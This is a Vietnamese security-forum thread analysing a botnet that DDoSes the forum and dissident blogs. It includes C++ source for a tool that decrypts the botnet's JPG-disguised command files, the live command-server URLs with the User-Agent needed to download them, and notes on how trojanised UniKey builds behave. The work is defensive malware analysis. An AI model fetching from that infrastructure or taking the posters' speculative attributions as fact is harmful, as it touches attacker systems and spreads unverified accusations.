Cách làm cho Symantec "tỉnh ngộ" là cách than phiền chính thức đến nó với vị thế khách hàng. Ví dụ, cứ nói với nó là bồ dùng Symantec và antivirus này không detect ra virus. Trong khi đó, dùng Avira thì Avira lại tóm được. Nói thêm với nó là nhiều người đã submit mẫu đến Symantec nhưng Symantec làm ngơ. Để cho đủ đô, doạ nó là công ty của bồ sẽ không dùng Symantec nữa nếu như Symantec vẫn có thái độ như vậy. Hù cái gì chớ hù vô túi tiền thì bố cu cậu nào cũng ngán :-) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

Ok anh, em sẽ thử xem "tốc độ" reply của Symantec nhanh đến cỡ nào :))

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

angel_of_devil wrote:

Ok anh, em sẽ thử xem "tốc độ" reply của Symantec nhanh đến cỡ nào :))

Trong các antivirus thì tốc độ đón nhận, phân tích, xử lý và cập nhật virus def phải nói là: 1) Avira dẫn đầu. 2) Clamav đứng thứ nhì. 3) Sophos đứng thứ ba. 4) Microsoft đứng thứ tư. 5) McAfee đứng thứ năm. Các nhóm còn lại thì rất lê thê, đàng đệ. Nhóm tệ nhất là nhóm Symantec. Có lẽ tụi này bự quá nên... "nâu ke" ;).

Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat — GMT

Tôi xác nhận là trên trang chủ của Unikey.org , phiên bản mới nhất là UniKey 4.0 RC2 (Build 091101 NT) - Phát hành ngày 1/11/2009 , Link Download được đưa lên tại trang Forum của Unikey (http://www.unikey.org/forum/viewtopic.php?f=7&t=2673), rồi từ đây người dùng sẽ được chuyển đến trang download tại Sourceforge.net với link download bản mới nhất: https://sourceforge.net/projects/unikey/files/unikey-win/4.0%20RC2/unikey40RC2-1101-win32.zip/download Các bạn có thể truy cập theo link sau để thấy toàn bộ các phiên bản tải về của Unikey http://sourceforge.net/projects/unikey/files/unikey-win File cài đặt mà bạn mylove14129 tải về có tên Uk40BSetup.exe , được tải về từ phân mục http://sourceforge.net/projects/unikey/files/unikey-win/4.0-Beta/ Đây là bản beta của Unikey version 4, bản mới nhất phải là UniKey 4.0 RC2 (Build 091101 NT) ------------------------------ Về việc một số antivirus "ít tên tuổi" nhận diện Unikey ( sạch tải về từ Unikey.org ) là một loại Trojan, tôi có ý kiến như sau: 1. Unikey là phần mềm hỗ trợ gõ tiếng Việt trên hệ điều hành Windows, sử dụng phương pháp chặn bắt các message của hệ điều hành để nắm bắt sự kiện người dùng gõ phím. Trong khi đó, các keylogger cũng thường dùng cách này để ghi nhận các thao tác gõ phím của người dùng. Do đó, các antivirus ít tên tuổi sẽ dễ dàng nhầm lẫn Unikey là một keylogger . Đây là một điểm yếu trong thiết kế của Unikey. Các bạn có thể tham khảo thêm bằng cách đọc mã nguồn của Unikey để được rõ hơn 2. Các antivirus này ít tên tuổi sẽ ít được người dùng trong nước sử dụng và submit tình trạng nhận diện sai một phần mềm an toàn, nên antivirus đó không đưa unikey vào danh sách "white list", khiến nó dễ dàng bị hiểu lầm do lý do ở mục 1

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

thanks xnohat,mv1098. Có lẽ do mình hơi vội vàng nên không để ý. Mục đích mình up lên chỉ là để cho thấy rằng hiện tại rất nhiều người cũng đang theo dõi topic này và đang dùng bản unikey đó, hoặc bản rc1, rc2,... gì gì đó mà up lên bị báo là vr thì cũng đừng nên quá lo lằng rằng máy tính bị dính vr của stl. Và theo mình có lẽ cũng không nên tin tưởng quá mức vào lũ AV đang cài trên máy tính. Dù sao để phát hiện vr mới đa số các AV vẫn phải dùng kỹ thuật heuristics , trước khi phát tán vr coder đã phải test chán che để có thể che mắt được bọn AV này rồi. P/s vấn đề này ngừng ở đây để khỏi làm loãng topic của a TQN

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

sourcefire wrote:

hic hôm nay đọc được bài này, kiểm tra lại file unikey của mình và download lại từ trên trang chủ về thì thấy dung lượng khác nhau, kiểm tra trên virustotal thì được report thế này, không biết có phải của STL không nữa: http://www.virustotal.com/file-scan/report.html?id=9852b3c19f9cca4aa35c16f2cc54911a54c0aa7d13d232fa5adb6a62918260dc-1312720738 Đây là nguyên mẫu file unikey, nhờ các bạn kiểm tra xem phải của STL không? http://www.megaupload.com/?d=FLM02K3G File này mình nhớ là trước đây cũng down từ trang chủ unikey, nhưng không biết là có phải thực sự bị dính STL không nữa.

Tôi đã download bản Unikey từ link trên và mở ra xem qua. Tôi chưa có thời gian thử nghiệm thưc tế và phân tích version của Unikey này. Tuy nhiên xét về "hình thức' các file, thì dường như nó giống như bản Unikey mà bạn axasin trước đây đã cung cấp, mà tôi đã kiểm tra và phân tích. Vì vậy nó có khả năng cũng bị nhiễm virus của STL. Chiêu nay (nếu HVA forum không bị DDoS) tôi sẽ post lên chi tiết kiểm tra thưc tế Malicious Unikey mà bạn axasin đã gửi trước đây. Có nhiều điểm lý thú và kết quả kiểm tra thưc tế giúp ta trả lời được nhiều điểm còn thắc mắc, như vấn đề liên quan đến các file MsHelpCenter.* chẳng hạn. Xin các bạn đón đọc

Phân tích tính chất vài trận DDoS HVA vừa qua.

Here i am — GMT

các bác kiểm tra cái java update này xem,vài ngày nó lại truy cập cái gì đấy cháu không biết,có thử nén lại nhưng không được nên phải upload nguyên cả thư mục http://www.mediafire.com/#cgoo6id0e9qn0,1

Phân tích tính chất vài trận DDoS HVA vừa qua.

latlaobao — GMT

PXMMRF wrote:

Chiêu nay (nếu HVA forum không bị DDoS) tôi sẽ post lên chi tiết kiểm tra thưc tế Malicious Unikey mà bạn axasin đã gửi trước đây. Có nhiều điểm lý thú và kết quả kiểm tra thưc tế giúp ta trả lời được nhiều điểm còn thắc mắc, như vấn đề liên quan đến các file MsHelpCenter.* chẳng hạn. Xin các bạn đón đọc

Em chỉ mong có bấy nhiêu à! Lời hứa của một Admin luôn có giá trị.Trình độ IT của em thì bằng dê rô nhưng em lại thích đọc những phân tích của các bác, đọc những bài phân tích của bác Conmale, "TQN= Than Quảng Ninh", PXMMRF em thấy sáng ra nhiều điều, sáng ở đây là từ một người mù có người cầm tay chỉ cho mình hướng đi nhưng đi đâu thì mình chưa biết vì mình đang " mù" mà. Đi đâu thì đi giữ cho mình một chữ "TÂM" là được.:P

Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp — GMT

conmale wrote:

angel_of_devil wrote:

Ok anh, em sẽ thử xem "tốc độ" reply của Symantec nhanh đến cỡ nào :))
Trong các antivirus thì tốc độ đón nhận, phân tích, xử lý và cập nhật virus def phải nói là: 1) Avira dẫn đầu. 2) Clamav đứng thứ nhì. 3) Sophos đứng thứ ba. 4) Microsoft đứng thứ tư. 5) McAfee đứng thứ năm. Các nhóm còn lại thì rất lê thê, đàng đệ. Nhóm tệ nhất là nhóm Symantec. Có lẽ tụi này bự quá nên... "nâu ke" ;).

Hức hức ... Tuy ko phải fan của Bác Quảng Nổ nhưng em cũng chẳng anti Quảng Nổ vì em cũng cài Bkav Pro. Thấy mẫu nào trên diễn đàn các bác up lên em thấy Bkav chém hết :( Bác comale xếp vị trí cho công ty anh ý cái :D

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

ptv_vbhp wrote:

conmale wrote:

angel_of_devil wrote:

Ok anh, em sẽ thử xem "tốc độ" reply của Symantec nhanh đến cỡ nào :))
Trong các antivirus thì tốc độ đón nhận, phân tích, xử lý và cập nhật virus def phải nói là: 1) Avira dẫn đầu. 2) Clamav đứng thứ nhì. 3) Sophos đứng thứ ba. 4) Microsoft đứng thứ tư. 5) McAfee đứng thứ năm. Các nhóm còn lại thì rất lê thê, đàng đệ. Nhóm tệ nhất là nhóm Symantec. Có lẽ tụi này bự quá nên... "nâu ke" ;).
Hức hức ... Tuy ko phải fan của Bác Quảng Nổ nhưng em cũng chẳng anti Quảng Nổ vì em cũng cài Bkav Pro. Thấy mẫu nào trên diễn đàn các bác up lên em thấy Bkav chém hết :( Bác comale xếp vị trí cho công ty anh ý cái :D

Tớ không có ý "xếp loại" công ty software antiviruses của Việt Nam. CMClab thì đã có người theo dõi và cập nhật virus def khá đều đặn rồi, còn BKIS thì tớ nhận nhiều phản hồi trái ngược nhau. Tớ thì không có BKIS "bờ rồ" để thử nghiệm cho nên không thể đánh giá nó được.

Phân tích tính chất vài trận DDoS HVA vừa qua.

latlaobao — GMT

ptv_vbhp wrote:

Hức hức ... Tuy ko phải fan của Bác Quảng Nổ nhưng em cũng chẳng anti Quảng Nổ vì em cũng cài Bkav Pro. Thấy mẫu nào trên diễn đàn các bác up lên em thấy Bkav chém hết :( Bác comale xếp vị trí cho công ty anh ý cái :D

Nhân viên của bác Quang hỏi ở đây nhiều lắm, Bác ý không tranh thủ những phân tích ở đây thì sao xứng danh là Quang hỏi nô hỏi được. Tui mà là thầy bói,nhà ngoại cảm tui cũng đưa chân rết đến tận tận cùng đất nước ấy chứ. Forum này không đưa lính vào cũng phí tâm cơ :D.

Phân tích tính chất vài trận DDoS HVA vừa qua.

luoi_doc_sach — GMT

Cho em hỏi câu này hơi trái lề xíu. Giờ mấy cái unikey (và cả vietkey em vừa check) đều dính malware giờ biết down ở đâu cái nào không bị nhiểm malware, trojan đây ạ??? Em thử down từ nhiều nguồn thì đều bị nhiễm hết @_@ Mà mấy cái Unikey này em xài lâu này, mà cả MSE, hay Avira, bitdefender đều không phát hiện ra. Chỉ vừa nãy em lên virustotal.com check thì lại thấy ... Nó có thực sự nguy hại lắm không ạ ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hu hu bà con ơi ! Ai giúp giùm em cái, mẫu mới của tụi stl mà em âm thầm RCE nó mấy ngày nay thì tới giờ, sau khi có kết quả, không lòi ra bằng chứng nào là mẫu đó là bot đang DDOS HVA ta ! Nó cứ đè danlambao.blogspot mà phang ! Không lý thằng AcrobatUpdater.exe vẫn còn sống ? Hay có 1 bot mới, server mới của tụi stl ???????????? Mong bà con tình nguyện tiếp tục dùng SmartSniffs, WireShark monitor xem thằng .exe nào đang connect tới HVA ta: www.hvaonline.net (74.63.219.12, 88.198.119.5, 49.212.30.177). PS: Tội nghiệp danlambao.blogspot.com: đang trong mục tiêu nhắm DDOS và phá hoại của tụi stl xấu xa này. Bà con nào cảnh báo chủ blog danlambao giùm ! Bạn Here I am up lại file java update của bạn giúp, có thể là mẫu mới của stl ! Gấp nhé ! Cảm ơn bạn ! Nếu chúng ta không xác định, tìm được con nằm vùng trên máy victim, con bot mới được down ở đâu về, và server mới nào của tụi nó ra lệnh DDOS, thì HVA chúng ta sẽ phải chịu DDOS dài dài, và mạng bot net mà tụi nó xây dựng ở VN ta sẽ ngày càng phình to ! Tới lúc nào đó mọi máy tính của VN đều là Zombie của tụi chó stl này hết ! (sorry anh em nhé, em bực quá rồi, tụi này mặt dày lắm, chửi vậy cũng chưa ăn thua đâu. Tụi nó còn tiếp tục chơi cái trò dơ bẩn, hèn hạ này hoài.)

Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 — GMT

TQN wrote:

Hu hu bà con ơi ! Ai giúp giùm em cái, mẫu mới của tụi stl mà em âm thầm RCE nó mấy ngày nay thì tới giờ, sau khi có kết quả, không lòi ra bằng chứng nào là mẫu đó là bot đang DDOS HVA ta ! Nó cứ đè danlambao.blogspot mà phang !

Kể cả có xác định được thì anh nghĩ có dập được không ạ ? Tốc độ cập nhật của các hãng av còn lâu hơn cả tụi nó update biến thể "mới". Lại thêm chuyện thử hỏi có bao nhiêu người biết được mình đang bị nhiễm và chương trình diệt virus trên máy họ có thể diệt được trước khi một mẫu mới được cập nhật. Mà chả hiểu sao cánh báo chí im ru bà rù thế nhỉ ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

vndncn — GMT

conmale wrote:

Hôm qua có anh bạn ghé thăm làm vài chai. Anh ấy hỏi tại sao hiện tượng DDoS rộng lớn và dai dẳng xảy ra như vậy mà các cơ quan hữu trách vẫn hoàn toàn im lặng? Tớ đớ lưỡi, không trả lời được câu hỏi này. Đây cũng là câu hỏi TQN và nhiều member đã lặp đi lặp lại nhiều lần. Hiện nay đám STL vẫn tiếp tục hì hụi tạo botnet khác và vẫn loay hoay với những biến thái mới cho con zombie đã có sẵn trong các máy con bị nhiễm malware. Ở Việt Nam có bao nhiêu nhóm kỹ thuật, có bao nhiêu cơ quan hữu trách, có bao nhiêu người dùng biết đến tình trạng này? Cách đây không lâu, vietnamnet bị tấn công dai dẳng và rồi mọi chuyện chìm lỉm. Tại sao? Chẳng lẽ không có ai biết được hoặc không có khả năng truy tìm và chấm dứt những hoạt động phi pháp này hay sao? HVA đã đưa ra quá nhiều bằng chứng và thông tin cần thiết, việc còn lại đối với các cơ quan hữu trách có lẽ chẳng phải là việc khó khăn gì (ngoại trừ không muốn làm hoặc vì lý do nào khác thì không cần phải bàn).

Chú conmale, vietnamnet.vn bị ddos, báo chí có thông tin, nhưng nói không điều tra ra được nguồn gốc tấn công(không biết thật hay giả nữa), người dân đen như chúng cháu không có thông tin nhiều, cứ nghĩ bị bọn THAHùng chơi khâm chứ. Còn hvaonline.net bị ddos có đăng trên một số diễn đàn nổi tiếng như: hvaonline.net, forums.congdongcviet.com, ddth.com, diendantinhoc.vn, vn-zoom.com, ... có đăng về tình trạng ddos hva này, vậy mà không thấy báo chí, cơ quan 2n nào DÁM NÓI, THẬT BẤT CÔNG. Cháu thường vào topic này và xem " Thông báo: về việc diễn đàn HVA bị gián đoạn sáng nay 14/7/2011"(khi HVA không bị ddos) để biết cách và cũng như nói cho mọi người biết về cách mà các anh và các chú HVA hướng dẫn để diệt malware STL( em cũng tìm Unikey và Winrar kô bị nhiễm malware, đã test trên virustotal gửi link cho mọi người). Thật may là các IP của Cty và ở nhà cháu không có trong danh sách IP ddos HVA. :) GIEO GÌ THÌ GẶT NẤY, MÌNH KHÔNG GẶT THÌ CON CHÁU MÌNH SẼ GẶT THAY CHO MÌNH ĐÓ MẤY ANH STL ẠH. MẤY ANH PHẢI NGHĨ CHO TƯƠNG LAI CON CHÁU CỦA MÌNH NỮA CHỨ, KHÔNG LẺ VÌ MÌNH MÀ CON CHÁU MÌNH PHẢI GÁNH CHỊU HẾT SAO. :-( QUAY ĐẦU LỜ BỜ MẤY ANH STL ƠI. WELCOME CÁC ANH TRỞ VỀ CHÍNH NGHĨA.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Here i am — GMT

TQN wrote:

Hu hu bà con ơi ! Bạn Here I am up lại file java update của bạn giúp, có thể là mẫu mới của stl ! Gấp nhé ! Cảm ơn bạn !

đây bác ạ http://www.mediafire.com/?cgoo6id0e9qn0

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cảm ơn Here i am ! Máy bạn cài JRE: Java Runtime Enviroment nên các file .exe bạn đã up là 100% của Sun, có signature của Sun, là các .exe để check và update JRE. Bạn yên tâm ! Hết việc làm, thất nghiệp, buồn quá, thôi show đoạn code decode mấy file jpg chứa mệnh lệnh DDOS danlambao.blogspot.com của mấy anh stl. Các file .jpg này được mấy anh stl đặt ở hai host sau: Code:

http://net.iadze.com/backgrounds.jpg
 http://net.iadze.com/fronts.jpg

 http://find.instu.net/backgrounds.jpg
 http://find.instu.net/fronts.jpg

Các server này dùng nginx, nếu các bạn download bình thường bằng trình duyệt thì sẽ không được. Các bạn nên dùng wget, Fiddler, putty... để down với User-Agent phải là:

Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13

Sau khi download về, các bạn chạy ct DecodeJPG.exe mà tui đã up ở đây để giải mã file .jpg đó ra thành file .gz, rồi dùng 7Zip hay WinRAR, WinZip mở ra. Trong file nén đó sẽ có file text chứa thông tin DDOS: Code của DecodeJPG: Code:

//---------------------------------------------------------------------------

#pragma hdrstop

#include 
#include 
#include 

#pragma argsused

//---------------------------------------------------------------------------

int GetOneXorByte(LPINT arrXor)
{
    int value1 = (arrXor[256] + 1) % 256;
    arrXor[256] = value1;

    int value2 = (arrXor[260] + arrXor[value1]) % 256;
    arrXor[260] = value2;

    int value3 = arrXor[value1];
    arrXor[value1] = arrXor[value2];
    arrXor[value2] = value3;
    return arrXor[(arrXor[arrXor[256]] + arrXor[arrXor[260]]) % 256];
}

int main(int argc, char* argv[])
{
    FILE *fIn = NULL;
    FILE *fOut = NULL;

    LPBYTE pJPGContent = NULL;
    LPBYTE pszData = NULL;
    BOOL bRetVal = FALSE;

    char szFileOut[MAX_PATH] = { '\0' };
    int arrXor[261] = { 0 };

    const char szKey[] = "0fb6f2f2dac443fd8beb5df3be320d36";
    int keyLen = strlen(szKey);

    printf("//-----------------------------------------------------------------------------------------\n");
    printf("// DecodeJPG: Decode the JPG files which are STL's DDOS C&C files\n");
    printf("// JPG files downloaded from the http://net.iadze.com/xxx.jpg and http://find.instu.net/xxx.jpg\n");
    printf("// RCE and coding by TQN (ThangCuAnh) - HVA Online Forum: www.hvaonline.net\n");
    printf("//-----------------------------------------------------------------------------------------\n\n");

    if (argc < 2)
    {
        printf("Usage: DecodeJPG JPGFile [Output File]");
        return EXIT_FAILURE;
    }

    char *szFileIn = argv[1];
    if (argc == 2)
    {
        char szDrive[_MAX_DRIVE] = { 0 };
        char szDir[_MAX_DIR] = { 0 } ;
        char szFName[_MAX_FNAME] = { 0 };
        _splitpath(szFileIn, szDrive, szDir, szFName, NULL);
        _makepath(szFileOut, szDrive, szDir, szFName, ".gz");
    }
    else
    {
        strncpy(szFileOut, argv[2], MAX_PATH);
    }

    fIn = fopen(szFileIn, "rb");
    if (NULL == fIn)
    {
        printf("Can not open input file: %s\n", szFileIn);
        return EXIT_FAILURE;
    }

    do
    {
        int i, value1, value2;

        fOut = fopen(szFileOut, "wb");
        if (NULL == fOut)
        {
            printf("Can not open output file %s\n", szFileOut);
            break;
        }

        fseek(fIn, 0, SEEK_END);
        int iJPGSize = ftell(fIn);
        fseek(fIn, 0, SEEK_SET);

        pJPGContent = (LPBYTE) malloc(iJPGSize);
        if (NULL != pJPGContent)
        {
            fread(pJPGContent, iJPGSize, 1, fIn);
        }
        else
        {
            printf("Not enought memory !\n");
            break;
        }

        pszData = (LPBYTE) malloc(iJPGSize);
        if (NULL == pszData)
        {
            printf("Nout enought memory for output buffer\n");
            break;
        }

        // Init arrXor
        for (i = 0; i < 256; ++i)
        {
            arrXor[i] = i;
        }
        arrXor[256] = arrXor[260] = 0;

        // Shuffle arr256
        while (1)
        {
            i = arrXor[256];
            if (i >= 256)
                break;
            value1 = (arrXor[260] + arrXor[i] + szKey[i % keyLen]) % 256;
            arrXor[260] = value1;
            value2 = arrXor[i];
            arrXor[i] = arrXor[value1];
            arrXor[value1] = value2;
            ++arrXor[256];
        }
        arrXor[256] = arrXor[260] = 0;

        // Xor loop
        for (i = 0; i < iJPGSize; ++i)
        {
            value1 = GetOneXorByte(arrXor);
            value2 = pJPGContent[i] ^ value1;
            pszData[i] = value2;
        }

        fwrite(pszData, iJPGSize, 1, fOut); // ghi lai noi dung da giai ma

        printf("Decode and extract data from JPG file %s to %s OK !\n", szFileIn, szFileOut);

        bRetVal = TRUE;
    } while (0);


    fclose(fIn);
    if (NULL != fOut)
    {
        fclose(fOut);
    }

    if (NULL != pJPGContent)
    {
        free(pJPGContent);
    }

    if (NULL != pszData)
    {
        free(pszData);
    }

    return bRetVal ? EXIT_SUCCESS : EXIT_FAILURE;
}
//---------------------------------------------------------------------------

Một số EXE, source C++, script của 010 Hex Editor để decode, extract data từ các "mèo què" của STL tui post ở đây: http://www.mediafire.com/?5g7r7c8eme0wjp2

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

TQN wrote:

Hu hu bà con ơi ! Ai giúp giùm em cái, mẫu mới của tụi stl mà em âm thầm RCE nó mấy ngày nay thì tới giờ, sau khi có kết quả, không lòi ra bằng chứng nào là mẫu đó là bot đang DDOS HVA ta ! Nó cứ đè danlambao.blogspot mà phang ! Không lý thằng AcrobatUpdater.exe vẫn còn sống ? Hay có 1 bot mới, server mới của tụi stl ???????????? Mong bà con tình nguyện tiếp tục dùng SmartSniffs, WireShark monitor xem thằng .exe nào đang connect tới HVA ta: www.hvaonline.net (74.63.219.12, 88.198.119.5, 49.212.30.177). PS: Tội nghiệp danlambao.blogspot.com: đang trong mục tiêu nhắm DDOS và phá hoại của tụi stl xấu xa này. Bà con nào cảnh báo chủ blog danlambao giùm ! Bạn Here I am up lại file java update của bạn giúp, có thể là mẫu mới của stl ! Gấp nhé ! Cảm ơn bạn ! Nếu chúng ta không xác định, tìm được con nằm vùng trên máy victim, con bot mới được down ở đâu về, và server mới nào của tụi nó ra lệnh DDOS, thì HVA chúng ta sẽ phải chịu DDOS dài dài, và mạng bot net mà tụi nó xây dựng ở VN ta sẽ ngày càng phình to ! Tới lúc nào đó mọi máy tính của VN đều là Zombie của tụi chó stl này hết ! (sorry anh em nhé, em bực quá rồi, tụi này mặt dày lắm, chửi vậy cũng chưa ăn thua đâu. Tụi nó còn tiếp tục chơi cái trò dơ bẩn, hèn hạ này hoài.)

Theo như anh conmale thông báo thì những ngày gần đây mạng zombies tấn công vào HVA chủ yếu là đặt ở nước ngoài. Như vậy là các user ở nước ngoài đã từng download về máy họ các software hay tool nào đó phổ biến, thông dụng và cần dùng ở nước đó, nhưng bị nhiễm virus của cấp trên của STL. Chúng sử dụng các Master webserver-website cũng đặt ở nước ngoài để update các bot, cho tấn công vào HVA. Chỉ có một số nhỏ zombies đặt ở VN. Nhưng có lẽ những zombie này đã nhiễm STL virus từ lâu. Sau đó chúng được update để tấn công vào HVA cũng đã từ lâu và hiện nay chúng không được newly updated, nên cứ giữ configuration để tấn công vào HVA. Vì vậy việc tìm ra Master- webserver hiện nay sẽ trở nên rất khó. Thôi thì ta phải mầy mò, cố gắng tìm hiểu, phân tích thêm vây. Qua sự việc này chúng ta thấy người thiết lập và điều khiển mang bot ở nước ngoài (và đang cho tấn công vào HVA) rõ ràng không phải là các chú nhỏ VN, làm thuê cho STL hay các thành phần người VN trong nhóm STL. Chúng phải là các thành viên "quốc tế" của một tổ chức là cấp trên của STL, lãnh đạo STL. Nhiều khả năng là các bác người Hoa sống ở nước ngoài.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Here i am wrote:

TQN wrote:

Hu hu bà con ơi ! Bạn Here I am up lại file java update của bạn giúp, có thể là mẫu mới của stl ! Gấp nhé ! Cảm ơn bạn !
đây bác ạ http://www.mediafire.com/?cgoo6id0e9qn0

Cả 6 file bạn gửi đều không phải virus bạn nhé, file sạch cả đấy ;) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Các mẫu virus của Sinh Tử Lệnh được gửi ở chủ đề này đều đã được cập nhật và diệt sạch với CMC Antivirus bản miễn phí ;) . Mong tiếp tục nhận được các mẫu virus mới từ anh chị em qua địa chỉ email sau, xin cảm ơn :) :

Phân tích tính chất vài trận DDoS HVA vừa qua.

tmd — GMT

Báo điện tử, chuyên trang vi tính, số..., toàn quảng cáo công nghệ hay thiết bị, tin tức. Chuyện phá hoại có chủ đích tới 1 2 cá nhân như hiện tại báo ta không đưa rầm rộ và đều đặn. Cái gì không muốn cho người ta biết thì không cho đăng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

kelieumang2 — GMT

tmd wrote:

Báo điện tử, chuyên trang vi tính, số..., toàn quảng cáo công nghệ hay thiết bị, tin tức. Chuyện phá hoại có chủ đích tới 1 2 cá nhân như hiện tại báo ta không đưa rầm rộ và đều đặn. Cái gì không muốn cho người ta biết thì không cho đăng.

Nói gì mà không trúng không trật gì hết! Thôi đừng nói! Úp úp mở mở cuối cùng chẳng ra được ý gì hết! Báo điện tử là báo nào? "Báo ta" là báo nào? "1 2 cá nhân" là sao?

Phân tích tính chất vài trận DDoS HVA vừa qua.

angel_of_devil — GMT

Báo chí truyền hình giờ có vẹo j đâu, viết 1 chữ phải ngó sang Ban Tuyên giáo TW 1 cái, làm j cũng phải theo đường lối. Mà STL là con đẻ của phe bảo thủ, làm sao mà đưa được cơ chứ

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

PXMMRF wrote:

Qua sự việc này chúng ta thấy người thiết lập và điều khiển mang bot ở nước ngoài (và đang cho tấn công vào HVA) rõ ràng không phải là các chú nhỏ VN, làm thuê cho STL hay các thành phần người VN trong nhóm STL. Chúng phải là các thành viên "quốc tế" của một tổ chức là cấp trên của STL, lãnh đạo STL. Nhiều khả năng là các bác người Hoa sống ở nước ngoài.

Qua điều tra (từ danh sách các IP trong bài này: /hvaonline/posts/list/39575.html#244574), em thấy rằng 100% các IP còn sống trong danh sách ấy đều mở cổng 8080 (http proxy) hoặc 3129 (squid proxy). Track lại tcpdump ở thời điểm ấy, vô số các requests dùng để DDoS HVA ngày hôm ấy đi xuyên qua các IP trên đều có thông tin "X-forwarded-For" hoặc "Via" IP nguyên thuỷ đằng sau proxies đều là IP đi từ Việt Nam. Điều này chứng tỏ, nguồn DDos này đã sử dụng hàng loạt các proxy servers (có thể là các proxy mở hoặc các proxy có cẩu hình thiếu chặt chẽ) để tấn công. Đối với trình duyệt và web services thì chuyện ẩn nấp sau proxies để "giấu IP" là chuyện thường thấy nhưng việc này cũng không thể qua mặt được "low level" tcpdump capture. Đối với 50Gb data đi xuyên 500 proxies thì khó nhận biết (vì 50Gb / 500 = 102Mb) nhưng nếu sử dụng phương tiện này để DDoS dai dẳng thì trước sau đám quản lý proxies cũng sẽ nghi ngờ và shutdown service. Có thể loạt DDoS ngày hôm ấy không phải của STL mà từ một nhóm nào khác "tát nước theo mưa". Loạt DDoS này có một số tính chất khá giống như các con "bots" của STL nhưng để khẳng định 100% thì không thể.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Sáng nay, file backgrounds.jpg của stl ở: http://net.iadze.com/backgrounds.jpg lại được cập nhật. Lần này, danh sách các site bị DDOS kéo dài hơn, đột ngột, không biết vì lý do gì. Ngoài danlambaovn.blogspot.com, còn thêm 7 site khác: [url] http://danlambaovn.blogspot.com http://www.dangvannham.com http://bienxua.over-blog.fr http://www.hanoihot.com http://www.aihuuphuyen.org http://nguoiduatinkami.wordpress.com http://vrvradio.com http://danlambaovn.disqus.com [/url] Trừ danlambaovn.blogspot.com là vô được, còn tất cả cád site còn lại tôi vô không được tới thời điểm này, tê liệt luôn. Lần này mấy anh "sống chết theo lệnh" hết gắn được cái nhãn "sống chết phập phù" của mấy anh vào mấy site đó, tức quá chơi đểu bằng cách DDOS ha ? Chơi bẩn vậy ha ?

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

TIẾP TỤC THÔNG BÁO KẾT QUẢ KIỂM TRA THỰC TẾ CÁC MẪU VIRUS-TROJAN CỦA STL Kiểm tra và phân tích file Unikey do bạn axasin cung cấp, chúng ta có thể tóm tắt những kết luận sau: 1- Trên mạng hiện đang có rất nhiều version Unikey. Có loại không bị nhúng virus vào (như Unikey download trực tiếp từ unikey.org), nhiều loại bị nhúng virus, trong đó đa phần là virus của STL. Việc RCE các version Unikey giúp xác định khá chính xác những version nào là malicious Unikey, version nào là origin-clean Unikey. Tuy nhiên RCE là kỹ thuật advanced, chỉ có rất ít người có thể thưc hiện. Các người sử dụng thông thương cần những khuyến cáo đơn giản, dễ áp dụng, để tránh cài nhầm vào máy các malicious Unikey (Unikey độc, có virus). Vả lại kỹ thuật RCE đơn thuần có thể không phát hiện hay chỉ ra đầy đủ quá trình virus thâm nhập và khởi phát thưc tế trong máy. Unikey (do bạn axasin phát hiện và cung cấp) là loai Stand-alone program. Nghĩa là bản Unikey này không cần cài đặt (vào HDH) mà chỉ cần copy và paste nó lên màn hình (desktop) để chạy nó (hoăc copy folder chứa Unikey vào một thư muc trong Program Files và send một shortcut ra desktop). Dung lượng của file Unikey.exe này là 666 KB (khá lớn). Đây là điểm chúng ta cần đặc biệt chú ý Xem hình 1 2- Khi nhấp chuột vao Unikey.exe thì trong máy xuất hiện (ngay tức khắc) một số file chính như sau: - MsHelpCenter.exe - MsHelpCenter.idx - _desktop.ini (phân biệt với file gốc desktop.ini của Windows, dung lương chỉ là khoảng 1KB) - RCX38C.tmp - thumbcache.db Cả 5 file này nằm trong một folder có tên là Microsoft Help, tai thư mục C;/WINDOWS/ (trên WinXP, Win2K3...). Đây là folder mới chứa 5 file mới nói trên mà virus tạo lập ngay sau khi nó vừa được kích hoat. Chúng (5 file trên) không phải là các file sẽ đươc virus của STL download trên mang về sau này, dù dung lượng của các file MsHelpCenter,* khá lớn (8-10 MB) Thưc ra dung lượng của từng file trong 2 file MsHelpCenter.* thay đổi theo các lần thử nghiêm. Thử nghiệm lần 2, tôi thấy dung lượng của chúng giảm hẳn, chỉ còn từ 2-3 MB. Theo tôi lý do của vấn đề dung lương các file MsHelpCenter.* khá lớn và thay đổi có lẽ do sau khi được virus tạo lập trong hệ thống, chúng map một số file khác trong hệ thống và thu gom về một số dữ liệu , cần thiết và không cần thiết (để cho dung lương lớn hơn, người dùng không nghi ngờ) Trong 5 file trên Avira antivirus chỉ phát hiện ra 2 file nhiễm virus là MsHelpCenter.idx và RCX38C.tmp. Avira phát hiện ngay khi files vừa đươc virus tạo lập ra. Xem hình 2. 3- Một điều theo tôi rất đáng lưu ý là: Sau khi STL virus được kích hoạt trong hệ thống (máy), thì chúng xoá ngay (delete) thành phần virus nhúng trong file Unikey.exe, làm cho dung lương của nó giảm hẳn, từ 666 KB xuống còn 256 KB. Điều đó cũng giúp cho Unikey.exe (nay đã sạch virus) chạy nhanh và ổn định hơn, thoả mãn yêu câu người dùng (họ sẽ không thắc mắc gì). Xem hình 3 4- Virus hay chính xác hơn là Windows cũng tạo 